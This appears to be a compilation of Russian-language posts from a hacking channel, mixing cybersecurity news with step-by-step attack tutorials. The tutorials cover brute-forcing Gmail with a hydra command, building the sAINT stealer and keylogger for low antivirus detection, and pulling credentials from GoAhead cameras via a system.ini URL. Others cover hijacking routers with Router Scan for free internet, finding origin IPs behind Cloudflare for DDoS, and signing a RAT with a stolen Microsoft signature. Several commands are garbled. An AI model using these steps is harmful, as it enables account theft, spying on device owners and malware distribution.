​​Хакеры взломали IT-системы правительства Азербайджана

Исследователи безопасности из подразделения Talos компании Cisco сообщили о вредоносной кампании, в рамках которой хакеры тайно взломали IT-сети правительства Азербайджана и получили доступ к дипломатическим паспортам некоторых официальных лиц.

Кибершпионаж часто совпадает с активизацией военных действий. Через несколько дней после того, как президент Азербайджана призвал к мобилизации солдат запаса, хакеры использовали в качестве приманки поддельный правительственный документ на ту же тему в ходе своих атак. Вредоносный код, внедренный в документ, способен похищать данные со взломанного компьютера и предоставить хакерам постоянный доступ к устройству.

Эксперты обнаружили шпионскую группировку в апреле нынешнего года. Вредоносное ПО преступников получило название PoetRAT, поскольку код был переполнен литературными отсылками. Раньше злоумышленники упоминали Уильяма Шекспира, но в последних обновлениях кода есть намеки на русского писателя Федора Достоевского.

В предыдущих кампаниях вредоносный документ загружал интерпретатор Python и вредонос PoetRAT, который использовал pyminifier для обфускации скрипта Python и предотвращения обнаружения на основе строковых правил или правил YARA.

Теперь новая версия вредоноса создает ZIP-файл на целевой системе и выполняет сценарий Lua в этом архиве. Архив содержит полезную нагрузку Lua и luajit (интерпретатор Lua для Windows). Скрипт загружает и выполняет дополнительную полезную нагрузку.

Специалисты Talos не сообщили, кто несет ответственность за кибератаки и сколько правительственных чиновников Азербайджана пострадало. Они назвали данную деятельность «шпионажем с последствиями для национальной безопасности», осуществляемую группировкой, «проявляющей особый интерес к различным правительственным ведомствам Азербайджана».

#новость

​​Как создать свой сайт в сети TOR с помощью Kali Linux

Практически каждый знает о теневом браузере TOR, который защищает пользователей путем скрытия всех основных данных и открывает доступ к сайтам в доменной зоне .onion. Эти сайты в основном используются для незаконной деятельности, но помимо этого в списке вебресурсов даркнета можно также найти различные информационные форумы, библиотеки, оппозиционные порталы и т.д.

Как подключиться к такому сайту знают многие, но как он функционирует и как его создать не все. Разберем детально этот процесс.

Установка компонентов

Для начала потребуется установить старую версию Kali Linux, к примеру 1.0.6.

Далее устанавливаем и распаковываем Shallot

◽️wget https://github.com/katmagic/Shallot/archive/master.zip
◽️unzip master.zip

Переходим в созданную директорию и запускаем сборку командами

◽️cd Shallot-master
◽️./configure
◽️make

Теперь установим непосредственно Tor и lighttpd

◽️apt-get install tor
◽️apt-get install lighttpd

Настройка

На данном этапе нужно сначала получить домен. Делается это командой

◽️./shallot ^codered

Создастся что-то на подобии coderedkpdsto4wxhr.onion и приватный ключ к нему. Вместо codered можно вставить любое название.

Далее запускаем Tor и lighttpd

◽️service tor start
◽️service lighttpd start

В файле /etc/tor/torrc нужно будет добавить такие строки

◽️HiddenServiceDir /var/lib/tor/hidden_service/
◽️HiddenServicePort 80 127.0.0.1:8080

В последней вместо локального ip можно внести внешний. Также желательно добавить эту строку

◽️ExcludeNodes {ru}, {ua}, {be}

Теперь по пути /var/lib/tor/hiddenservice в файл hostname нужно вписать полученный ранее домен, а в privatekey - приватный ключ.

Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные

◽️server.document-root = "/var/www/"
◽️server.error-handler-404 = "/404.html"
◽️server.tag = "Ваше значение"
◽️server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) }
◽️server.dir-listing = "disable"

Почти готово, нужно только создать вебстраницы index.html и 404.html в папке /var/www/, соответственно. Теперь при переходе по сгенерированному ранее адресу будет открываться созданный сайт. Стоит добавить, что в lighttpd можно уставить множество дополнительных модулей, тем самым модифицировать сайт.

#kali #TOR

​​Google предоставляет полиции данные о пользователях по ключевым словам

Ничто так не характеризует человека, как его история поиска в интернете, и для того чтобы получить столь важные сведения о пользователе, сотрудникам правоохранительных органов требуется решение суда. Тем не менее, как показывают недавно рассекреченные судебные материалы, следователи могут действовать и в обратном порядке – запрашивать не историю поиска конкретного подозреваемого, а перечень всех пользователей, вводивших в поисковик определенные ключевые слова.

Так, в августе нынешнего года полиция арестовала помощника певца R. Kelly, обвиняемого в сексуальных домогательствах, Майкла Уильямса за поджог автомобиля свидетеля в штате Флорида. Его обвинили в поджоге внедорожника, который стоял рядом с домой одной из жертв певца. По словам прокуроров, накануне М. Уильямс искал в интернете информацию о запугивании свидетелей и фальсификациях, а также о странах, у которых нет договора об экстрадиции с США, сообщает CNet.

Согласно материалам суда, Google предоставила полиции IP-адреса пользователей, искавших адрес жертвы, и ей удалось связать IP-адрес с номером телефона М. Уильямса. По этому номеру следствие смогло установить местонахождение подозреваемого на момент пожара и подтвердить, что именно он осуществил поджог.

Как сообщили представители Google в четверг, 8 октября, компания заботится о защите конфиденциальности своих пользователей, при этом оказывая содействие правоохранительным органам. Как уточнил директор по работе с правоохранительными органами и информационной безопасности Google Ричард Салгадо, такие запросы составляют менее 1% от общего числа ордеров и небольшую часть от общих запросов на раскрытие пользовательских данных, которые компания получает в настоящее время.

#новость

​​Взлом почты Gmail с помощью XHYDRA

Взлом почты особенно страшен тем, что через неё злоумышленник может восстановить доступ сразу к нескольким соцсетям пользователя. Поэтому лучше периодически проверять email на компрометацию в соответственных сервисах.

Сам процесс взлома может быть любым, от фишинга до брутфорса. О последнем сегодня речь и пойдет. Реализация атаки перебором для почтовых ящиков на протоколе smtp работает быстрее и стабильней, чем стандартные запросы на форму входа на сайте. Автоматизировать весь процесс будет утилита xHydra.

Использование xHydra

Поскольку xHydra уже предустановлена в Kali Linux шаг установки можно пропустить. Остается её запустить, выбрав в меню быстрого доступа "Password Attacks" раздел "Online Attacks" пункт "hydra-gtk" или просто прописав название программы в поиск.

Откроется графический интерфейс Hydra. Поскольку тестовую атаку будем проводить на адрес Gmail, то во вкладке "Target" в поля "Single Target", "Port Number" и "Protocol" вписываем значения smtp.gmail.com, 465 и smtp соответственно. Далее в разделе "Passwords" нужно указать логин атакуемого пользователя вписав его в пункт "Username". Логином выступает сама почта. В поле "Password List" нужно указать путь к словарю паролей.

Теперь остается только перейти во вкладку "Start" и нажать одноименную кнопку. Перебрав все пароли из словаря Hydra выведет результат работы. Этот способ можно также реализовать с помощью команды

◽️hydra -l <адрес gmail> -P <путь к словарю> -s 465 smtp.gmail.com smtp -v -V -f -t 1 -e nrs -S

#kali #хакинг

​​Армия США провела операцию в киберпространстве для защиты выборов

Киберкомандование США провело операцию против одного из крупнейших ботнетов Trickbot в рамках усилий по защите выборов президента США от внешнего вмешательства, сообщает газета Washington Post.

По данным газеты, военные США запустили операцию по временному нарушению работы Trickbot, состоящего из "не менее 1 миллиона захваченных компьютеров", которыми управляют "русскоязычные преступники".

По оценкам военных США Trickbot является одной из крупнейших бот-сетей в мире. Она используется для кражи финансовых данных и распространения вредоносного программного обеспечения.

Как объяснили источники издания, операция не предполагала полного уничтожения сети, "но это один из способов отвлечь их хотя бы на некоторое время, пока они пытаются восстановить работу".

В сентябре глава киберкомандования сухопутных войск США генерал Стивен Фогарти заявлял, что военные США активно готовят концепции информационной борьбы в киберпространстве в преддверии выборов 2020 года. По его словам, США должны открыто заявить оппонентам о проведении подобных операций, потому что это продемонстрирует, что Вашингтон не будет просто терпеть их действия, а готов дать ответ.

#новость

​​Продвинутый стиллер на Java

Практически все сталкивались с такими понятиями, как стиллер или кейлогер. Они бывают различных типов и реализаций, но конечная цель работы каждого - это компрометация информации атакуемого пользователя.

Продвинутый стиллер sAINT, который написан полностью на Java, совмещает в себе стиллер и кейлогер. С его помощью можно по почте получать фото с вебкамеры, снимок экрана и файл с нажатыми клавишами, при достижении установленного количества введенных символов.

Установка

Для начала нужно установить фреймворк maven

◽apt-get install maven -y

Скачиваем билдер с github

◽git clone https://github.com/tiagorlampert/sAINT.git

Переходим в созданную директорию и ставим права на скрипт установки

◽cd sAINT/
◽chmod +x configure.sh

Далее нужно будет создать почту gmail, через которую sAINT автоматически будет присылать собранную информацию. Также, перейдя по ссылке, необходимо разрешить отправку с ненадежных приложений.

Использование

Запускаем билдер командой

◽java -jar sAINT.jar

Далее нужно настроить функционал будущего стиллера. В меню все конкретно написано: в первом пункте адрес созданной почты, во втором пароль от нее и т.д. В итоге останется только подтвердить информацию.

Готово, вирус собран в .jar файл, который вполне можно преобразовать в .exe. Интересной особенностью данного стиллера является его низкий показатель обнаружения антивирусами.

​​Детские смарт-часы Xplora 4 могут тайно следить за пользователями

«Умные» часы Xplora 4 от китайской компании Qihoo 360 Technology Co., предназначенные для детей, могут скрытно делать фотографии и записывать аудио при активации путем зашифрованного SMS-сообщения. Как сообщили эксперты из ИБ-компании Mnemonic, бэкдор представляет собой не уязвимость, а преднамеренно скрытый функционал.

«Бэкдор сам по себе не является уязвимостью. Это набор намеренно разработанных функций, которые включают удаленную съемку фотографий, отправку данных о местоположении и прослушивание телефонных разговоров через встроенный микрофон. Бэкдор активируется путем отправки SMS-команд на устройство», — сообщили специалисты.

Согласно Mnemonic, Xplora 4 содержит пакет под названием «Persistent Connection Service», который запускается во время процесса загрузки Android и перебирает установленные приложения для создания списка «намерений» (команд для вызова функций в других приложениях).

При соответствующем намерении Android входящее зашифрованное SMS-сообщение, полученное приложением Qihoo SMS, может быть направлено через диспетчер команд в службе постоянного подключения для запуска команды приложения, такой как удаленной снимок памяти.

Как утверждают представители компании, проблема связана с неиспользованным кодом из прототипа, который в настоящее время исправлен. Когда разрабатывались «умные» часы, родители предоставили отзывы и пожелания иметь возможность связаться со своими детьми в чрезвычайной ситуации и получать изображения местоположения в случае похищения. Xplora включила данные функции в прототипе, но решила не реализовывать их в коммерческой версии из соображений конфиденциальности.

#новость

​​Как можно взломать камеру без брутфорса?

Взлом камер видеонаблюдения методом перебора паролей известен почти всем. Но сложный пароль ещё не означает, что устройство невозможно взломать. Существует масса уязвимостей в прошивках камер, которые позволяют спокойно обходить авторизацию.

В качестве примера рассмотрим уязвимость в устройствах видеонаблюдения на базе сервера GoAhead. Она уже получила должную огласку и количество уязвимых камер с каждым годом падает. На данный момент таких устройств остается примерно 15 000 по всему миру. Напомним, что весь материал предоставляется исключительно в ознакомительных целях.

Поиск уязвимых камер

Для поиска уязвимых камер видеонаблюдения используют Shodan. Прописав запрос

realm="GoAhead", domain=":81"

Запрос можно модифицировать, добавив к примеру параметр country:"RU". Тогда найдутся все устройства с открытым портом 81 и системой GoAhead, которые расположены в России. Значение в domain также можно менять.

По завершению поиска появится список уязвимых камер с подробной информацией об открытых портах, установленной системе, ip адресе и т.д.

Эксплуатация уязвимости

Для проведения тестовой атаки нам понадобится ip адрес камеры на базе GoAhead. Ключевой факт уязвимости GoAhead заключается в хранении данных для доступа к камере в незашифрованном файле конфигурации. Скачать его можно перейдя в браузере по адресу

http://<ip адрес камеры>:81/system.ini?loginuse&loginpas

Скачается файл с расширением .ini, открыв который в блокноте почти сходу можно наткнуться на имя пользователя и пароль. Остается перейти по адресу

http://<ip адрес камеры>:81

Вписать полученные значение, выбрать интерфейс просмотра и готово. Помимо трансляции самой картинки в реальном времени в камерах GoAhead обычно есть возможность управлять ими используя стрелки.

#хакинг

​​Армия США может использовать искусственный интеллект для точечных атак по позициям вероятного противника

В публикации американского издания C4ISRNET раскрывается алгоритм Project Convergence, позволяющий Армии США использовать спутники и искусственный интеллект (ИИ) для нанесения точного удара по позициям вероятного противника, в частности России и Китая.

Издание пишет, что низкоорбитальные спутники используются для получения снимков поля боя. Соответствующие сведения поступают на наземную станцию ​​обработки данных Tactical Intelligence Targeting Access Node (TITAN), где проходят обработку системой ИИ Prometheus, выявляющей расположение объектов противника. Затем данные координаты передаются на командный пункт, где обрабатываются системой Tactical Assault Kit.

Система может определить, какое именно оружие необходимо для нанесения удара по вражескому объекту. «Оператор согласовывает рекомендацию, и данные о наведении отправляются в систему вооружения или солдату для нанесения удара», — пишет C4ISRNET.

Несмотря на то, что такая цепочка кажется достаточно сложной, на самом деле все операции выполняются в считанные секунды. Однако подобное описание вызывает скептическое отношение, так как на недавних тестовых запусках подобных систем американские военные отмечали расположение войск потенциального противника ручкой на бумаге.

#новость

​​Router Scan. Взлом роутера и получение бесплатного интернета

Программа для поиска уязвимых роутеров Router Scan обрела популярность ещё пару лет назад. Со временем количество уязвимых роутеров стало только больше, что поставило под угрозу огромное количество пользователей. Ведь при получении доступа к маршрутизатору злоумышленник может перехватывать данные, изменять настройки DNS или поднять VPN, тем самым обеспечив себе доступ в Интернет за чужой счет. О последнем варианте и как от него уберечься речь сегодня и пойдет.

Установка и поиск роутеров

Скачиваем Router Scan с официального сайта.

Теперь нам понадобятся диапазоны ip адресов. Взять их можно с этого сайта, введя название любого города.

Полученные диапазоны нужно вписать в соответствующее поле в верхней панели Router Scan. В "Scan ports" можно оставить значения по умолчанию. В "Scanning modules" нужно выбрать только три первых пункта.

После нажатия "Start scan" во вкладке "Good Results" начнут появляться потенциально уязвимые устройства с полученными авторизационными данными. Если при подобной проверке ip диапазона вашего города вы нашли в "Good Results" свой роутер, то уже на этом этапе лучше обратиться в техподдержку или вручную обновить прошивку роутера, скачав её с официального сайта.

Подключению к роутеру и поднятие VPN

Подключение к уязвимому роутеру реализуется за счет браузера. В поисковую строку нужно вписать запрос в виде

<ip роутера>:<порт>

Откроется форма входа, в которую нужно вписать данные из колонки "Authorization" в Router Scan.

Далее идет процесс поднятия VPN. У каждого роутера разный интерфейс, а некоторые данную функцию вообще не поддерживают. Если объяснять поверхностно, то для начала нужно будет включить службу PPTP вписав придуманные авторизационные данные и выбрав уникальный локальный ip. После чего настроить NAT пробросив порты 1723 и 1729.

Подключаться к созданному VPN можно через встроенную службу Windows, которая находится по пути

"Пуск" -> "Панель управления" -> "Сеть и интернет" -> "Центр управления сетями и общим доступом" -> "Настройка нового подключения или сети" -> "Подключение к рабочему месту"

Выбрав "Использовать моё подключение к интернету(VPN)" нужно вписать ip роутера и придуманные ранее авторизационные данные. Готово, теперь весь трафик атакующего ПК будет идти за счет владельца взломанного роутера.

#хакинг

​​В сентябре число продаваемых в дарквебе взломанных сетей утроилось

В сентябре 2020 года число рекламных объявлений в дарквебе, предлагающих доступ к взломанным ИТ-сетям, выросло в три раза в сравнении с августом. Такими данными поделились исследователи из KELA.

В отчёте специалистов отмечается, что в общей сумме за доступ ко всем сетям преступники требуют около $505 тысяч. Соответствующие предложения размещаются на популярных хакерских форумах.

Около четверти от общего числа скомпрометированных данных злоумышленники продали другим киберпреступникам, планирующим атаковать пострадавшие от утечки компании.

Эксперты убеждены, что свою роль в таком скачке продаваемого доступа к взломанным сетям сыграли уязвимости в продуктах крупных компаний: серверах Pulse Secure и Fortinet VPN, шлюзах Citrix.

Злоумышленники оперативно начали эксплуатировать эти бреши, что привело к массовой компрометации сетей. Помимо этого, на площадках дарквеба также продаются взломанные конечные точки RDP и VNC, большая часть которых попала в руки преступников благодаря брутфорс-атакам и IoT-ботнетам.

По данным команды KELA, средняя цена за взломанную сеть составляет $4960, но разброс в целом громадный — от $25 до $102 000.

#новость

​​34% организаций контролируют геолокацию удалённых сотрудников

«Первая волна» коронавируса заставила работодателей задуматься об организации защищенных сервисов для удаленной работы. Согласно недавнему опросу, организации прежде всего позаботились о безопасности каналов дистанционного взаимодействия: 90% компаний полностью или частично используют VPN для удаленной работы.

Много внимания уделяется контролю доступа к конфиденциальной информации: 52% организаций регулярно проверяют права и перечень ресурсов, доступных для удаленных пользователей. Более 40% работодателей осуществляют мониторинг и записывают действия сотрудников и подрядчиков, удаленно подключающихся к корпоративной инфраструктуре.

Компании следят не только за тем, что сотрудники делают в корпоративной сети, но и за их местоположением и количеством отработанного времени: 34% опрошенных контролируют геолокацию и ведут учет длительности удаленных сессий и интервалов работы.

Организации проверяют устройства, с которых сотрудники подключаются к инфраструктуре. 38% компаний оценивает состояние устройств пользователей в момент их подключения по VPN и отслеживает наличие обновлений безопасности ОС и антивируса, не допуская зараженный компьютер в сеть.

#новость

​​Защита от ARP спуфинга

MITM атака посредством ARP-spoofing довольно проста в реализации и соответственно распространена. Она позволяет злоумышленнику просматривать, изменять и останавливать сетевой трафик на ПК жертвы, что может привести к компрометации паролей и другой важной информации.

Защититься от ARP спуфинга поможет простой скрипт shARP. Он работает в двух режимах: защитный и наступательный. Первый при обнаружении спуфера, отключает систему пользователя от сети и выводит MAC адрес злоумышленника. Второй режим поинтересней, процесс работы у него идентичный защитному, только при обнаружении спуфера скрипт дополнительно начинает посылать ему пакеты деаутентификации, тем самым не давая подключиться к сети вновь.

Установка

Скачиваем репозиторий с github

 clone https://github.com/europa502/shARP

Переходим в директорию со скриптом и ставим на него права

 sharp
◽️chmod +x shARP.sh

Использование

Помимо режимов в новой версии скрипта при запуске нужно указывать также тип сканирования. Их всего два: активный и пасивный. Первый используется, если систему большую часть времени простаивает и не занята передачей данных по сети. Второй наоборот лучше использовать если система взаимодействует с сетью.

Соответственно команда запуска защитного режима с активным сканирование выглядит так

 ./shARP.sh -d -a <сетевой интерфейс eth0 или wlan0>

Защитный режим с пассивным сканированием

 ./shARP.sh -d -p wlan0

Наступательный режим с активным сканированием

 ./shARP.sh -o -a wlan0

И наконец наступательный режим с пассивным сканированием

◽️bash ./shARP.sh -o -p wlan0

​​Навигационное приложение Waze от Google позволяет следить за пользователями

Исследователь безопасности Питер Гаспер (Peter Gasper) из компании DevOps обнаружил уязвимость в популярном навигационном приложении Waze от Google. Проблема позволяет точно отслеживать передвижение ближайших водителей в режиме реального времени и идентифицировать их.

Waze использует собранную из краудсорсинга информацию, предназначенную для предупреждения водителей о препятствиях, которые могут мешать им легко добираться на работу, например, заторы на дорогах, строительные работы, аварии и пр., а затем предлагает альтернативные и более быстрые маршруты для обхода этих препятствий. Приложение также отображает местоположение других водителей в непосредственной близости по GPS.

Гаспер обнаружил, что Waze не только отправляет пользователю координаты других ближайших водителей, но также не меняет со временем идентификационные номера, связанные с иконками других пользователей. Создав редактор кода и разработав расширение для Chromium для сбора ответов JSON из API, эксперту удалось визуализировать перемещение пользователей между районами города и даже самими городами.

Специалист сообщил о своей находке Google в декабре прошлого года. Компания исправила проблему и выплатила специалисту 1337 долларов США.

#новость

​​ZeroNet. Пиринговый интернет

Децентрализованная сеть ZeroNet созданная в 2015 обрела особую популярность в Китае. С её помощью стало возможным обходить "Золотой щит" - систему фильтрации содержимого интернета в КНР. Написанное полностью на Python, ПО ZeroNet использует протокол BitTorrent для обмена файлами и ЭЦП для подтверждения авторства сообщений.

Установка

Установить Kali Linux.

Перед установкой ПО ZeroNet потребуется скачать несколько пакетов для python

 apt-get update 
◽️sudo apt-get install msgpack-python python-gevent

Далее скачиваем архив с клиентом и распаковываем

 https://github.com/HelloZeroNet/ZeroNet/archive/master.tar.gz
◽️tar xvpfz master.tar.gz

Использование

Перейдя в созданную папку открываем ZeroNet командой

 zeronet.py

Готово, мы подключились к сети. Теперь нужно перейти в браузер и вписать в поисковую строку


Оказавшись на главной странице, можно перейти к списку сайтов. Помимо китайских ресурсов, есть также английские и русские. Из главных стоит отметить новостной агрегатор Zero News, видеохостинг ZeroTube и даже p2p почту Zero Mail.

​​Хакер подобрал пароль к твиттеру Дональда Трампа с пятой попытки

Эксперт по кибербезопасности, хакер из Нидерландов Виктор Геверс уверяет, что снова смог войти в твиттер президента США. В прошлый раз у него это получилось в 2016-м. Об успехе хакера 22 октября пишет Volkskrant.

По данным издания, Геверс подобрал пароль с пятой попытки — оказалось, что это «maga2020!” - лозунг предвыборной кампании Трампа (Make America Great Again). Причем хакер говорит, что система не запросила подтверждения после четырех попыток ввода пароля. На аккаунте не была установлена двухфакторная аутентификация. Геверс сообщил о своем успехе в ЦРУ, ФБР и сам Twitter. Спустя день у аккаунта появились дополнительные меры безопасности, а через два дня ему принесли благодарность спецслужбы, уверяет хакер.

При этом в мировых СМИ сомневаются, что аккаунт президента США был так слабо защищен. Хотя в 2016-м подобранный пароль также не отличался оригинальностью - «yourefired» («ты уволен»).

Официальный представитель Twitter заявил, что у него нет свидетельств, которые подтверждают публикацию Volkskrant.

#новость

​​Обход Cloudflare

Cloudflare - это сервис для ускорения работы сайта и защиты его от DDOS атак. Получил широкое распространение благодаря своей условной бесплатности.

Cloudflare заменяет основной ip адрес сайта, тем самым не давая провести DDOS атаку, ведь если атаковать маскировочный ip система начнет отражать весь подозрительный трафик. Однако Cloudflare не является панацеей, и есть огромное количество способов получить коренной ip: через поддомены, историю домена или DNS и т.д. Автоматизирует все эти способы инструмент HatCloud.

Установка

Устанавливаем Kali Linux.

Скачиваем репозиторий с github

 clone https://github.com/HatBashBR/HatCloud

Переходим в созданную директорию и ставим права на исполняемый файл

 HatCloud/
chmod +x hatcloud.rb

Использование

Запускаем проверку командой

 hatcloud.rb –b <домен сайта>

Спустя некоторое время программа выведет всю полученную информацию. Помимо основного ip, может также быть получена локация сервера, название хостинга, название организации и т.д.

​​Как подобрать пароль к зашифрованному архиву

Потребность в получении пароля к архиву достаточно распространена не только у злоумышленников, но и у обычных пользователей. Поскольку в стандартных алгоритмах архивации rar и zip до сих пор не было найдено уязвимостей, единственный верный способ получить пароль - подобрать его.

Для этого предназначена утилита ZIP-Password-BruteForcer. Она написана на Python, поэтому может работать как на Windows, так и на Linux.

Установка

Рассмотрим установку на Kali Linux, который в свою очередь можно скачать по ссылке.

Клонируем репозиторий командой

 clone https://github.com/The404Hacking/ZIP-Password-BruteForcer

Использование

Переходим в созданную директорию и запускаем скрипт

 ZIP-Password-BruteForcer
◽️python ZIP-Password-BruteForcer.py

Перед нами появится консольное меню. Для запуска атаки перебором нужно прописать 1. Далее вводим путь к зашифрованному zip архиву и словарю, нажимаем Enter. Процесс будет запущен, и в зависимости от мощности процессора скорость может достигать 150 вариаций в секунду. При успешном подборе пароль отобразится в терминале.

#хакинг

​​США задействует ИИ технологии Google для отслеживания мигрантов

В августе 2020 года Служба таможенного и пограничного контроля США приняла предложение об использовании технологии Google Cloud. Она облегчает работу искусственного интеллекта, разработанного INVNT. Среди других проектов INVNT работает над технологиями для новой «виртуальной» стены вдоль южной границы, которая объединяет вышки наблюдения и дроны, покрывая территорию датчиками для обнаружения несанкционированного проникновения в страну.

В контракте указано, что сотрудничество СВР (служба военной разведки) и Google осуществляется с помощью фирмы Thundercat Technology — торгового посредника, позиционирующего себя как ведущего поставщика информационных технологий для федеральных контрактов. Документы показывают, что технология Google для CBP будет использоваться в сочетании с работой, проделанной Anduril Industries, стартапом в области оборонных технологий.

Подход Anduril Industries резко контрастирует с подходом Google. В 2018 году компания опубликовала список «Принципов ИИ», в котором провозглашалась социальная польза Google, разработка методов защиты и безопасности. В этом документе руководство Google обозначило, что не собирается применять искусственный интеллект для создания оружия, организации наблюдения, нарушающего международные признанные нормы, технологий, которые могут принести вред.

«Этот отчет показывает, что Google устраивает, что Anduril и CBP следят за мигрантами с помощью их облачного ИИ, несмотря на то, что их Принципы ИИ утверждают, что не причиняют вреда и не нарушают права человека», — сказал Джек Поулсон, основатель Tech Inquiry и бывший научный сотрудник Google, который покинул компанию из-за этических соображений.

#новость

​​Угон сертификата подписи Microsoft

Code Signing сертификат - это фактически подпись разработчика программного обеспечения, которая подтверждает, что с момента её наложения код никоим образом не изменялся. Наличие Code Signing сертификата у определенной программы повышает доверие к ней со стороны Windows.

Если же цифровой подписи у приложения нет, то при его запуске начиная с Windows XP будет выводиться предупреждение. Зная этот факт злоумышленники начали копировать сертификаты с безопасных программ на вредоносные. Широкую популярность этот способ получил благодаря группировке C@T, которая в марте 2015 года запустила на форуме Antichat продажу сертификатов Microsoft Authenticode. По их заявлениям подпись вируса таким сертификатом повышает количество установок на 30-40%.

Как это все реализуется на практике? Существует инструмент SigThief, который копирует подпись с одного исполняемого файла на другой. Рассмотрим его поподробней.

Установка

Данный эксплоит работает на Windows.

Скачиваем репозиторий по ссылке и разархивируем.

Использование

Для подписания вредоносного файла потребуется файл-донор. Им может выступать любая системная программа Windows с сертификатом, наличие которого можно проверить в "Свойствах", вкладка "Цифровые подписи".

Для копирования подписи вводим команду

 sigthief.py -i <файл с подписью> -t <вирус> -o <куда и под каким названием сохранить подписанный файл>

Для примера подпишем RAT

 sigthief.py -i C:\Windows\System32\consent.exe -t rat.exe -o notrat.exe

Готово! Наличие подписи можно проверить в свойства созданного файла.

#хакинг